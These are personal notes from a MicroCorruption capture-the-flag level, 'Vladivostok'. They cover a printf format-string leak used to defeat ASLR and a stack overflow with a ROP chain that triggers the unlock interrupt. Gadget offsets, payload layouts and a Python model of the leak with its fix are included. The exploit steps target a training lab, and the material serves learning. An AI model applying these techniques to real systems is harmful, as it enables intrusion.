MicroCorruption/15-Vladivostok/notes.md

Taken verbatim from my notebook

Page 1

Vladivostok     ASLR bypass?
    username[8]: 0x242b
    password[ ]
    aslr_base = r11

    aslr_address = normal - 0x4000 + aslr_base

    Have to call 0x10 directly?
        INT 7f:
            Takes no arguments      (THE LESSON WAS)
            7f passed in SR          (ROP CHAINING)
        All calls to INT wrapped in  (+ASLR BYPASS)
            push/pop SR?
            Neat?

    41414141[r10][r11][ret]
    FUCKING PRINTF?

    Things I have:
        printf(username, ...)
        buffer overflow on stack

    Things I need
        Address on stack?

    Flow: 1. enter "username"
          2. "username" printed
                            <- Create payload
          3. enter "password"
          4. buffer overflow

Page 2

The Hack    (Vladivostok)

    Uname payload: "%x%x%x%x"
        output %printf
    Pword payload: "AAAA(r10)(r11)(pc)[args...]"

    Useful locations:
        +2aa:   pop sr
        +2ac:   add 8, sp
        +2ae:   __check_password

        +56c:   mov.b @sp,   r15;
                sxt   r15       ; pop.b r15
                incd  sp        ;
                ret             ;

        +4f4:   swpb  r15       ;
                mov   r15,   sr ;
                bis   #8000, sr ; INT
                call  0x10      ;
                ...             ;
                ret             ;

    [popb]7f7f[INT]
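Added below, not from the notebook: a small Python model of why `printf(username, ...)` leaks the stack words that the `%x%x%x%x` username payload pulls out, why `printf("%s", username)` does not, and the notebook's own rebase formula. The stack words and addresses are constructed placeholders, not values from the challenge.

```python
# Constructed model of the Vladivostok format-string leak (added example,
# not the challenge's code). The MSP430 is 16-bit and little-endian, and a
# vararg printf pulls one 16-bit word per "%x" straight off the stack.

# Constructed stack snapshot at the moment printf runs, low address first.
# Only the idea (saved registers sitting above the frame) follows the notes;
# the numbers are placeholders.
SAMPLE_STACK = [0x0000, 0x4a8e, 0x0002, 0x4af6]


def msp430_printf(fmt, stack):
    """Minimal vararg model: every "%x" consumes the next word of `stack`."""
    words = iter(stack)
    out, i = [], 0
    while i < len(fmt):
        if fmt.startswith("%x", i):
            out.append(f"{next(words, 0):04x}")   # 4 hex digits per 16-bit word
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)


def vulnerable_echo(username, stack):
    """printf(username, ...): the user string IS the format, so it reads the stack."""
    return msp430_printf(username, stack)


def fixed_echo(username, stack):
    """printf("%s", username): constant format, user data is never interpreted."""
    return username


def rebase(normal_addr, aslr_base):
    """Notebook formula: aslr_address = normal - 0x4000 + aslr_base (16-bit wrap)."""
    return (normal_addr - 0x4000 + aslr_base) & 0xFFFF


if __name__ == "__main__":
    print("vulnerable:", vulnerable_echo("%x%x%x%x", SAMPLE_STACK))
    print("fixed:     ", fixed_echo("%x%x%x%x", SAMPLE_STACK))
```

The fixed variant is the one-line mitigation: a constant format string removes the leak, and without the leaked base the `normal - 0x4000 + aslr_base` arithmetic has nothing to work with.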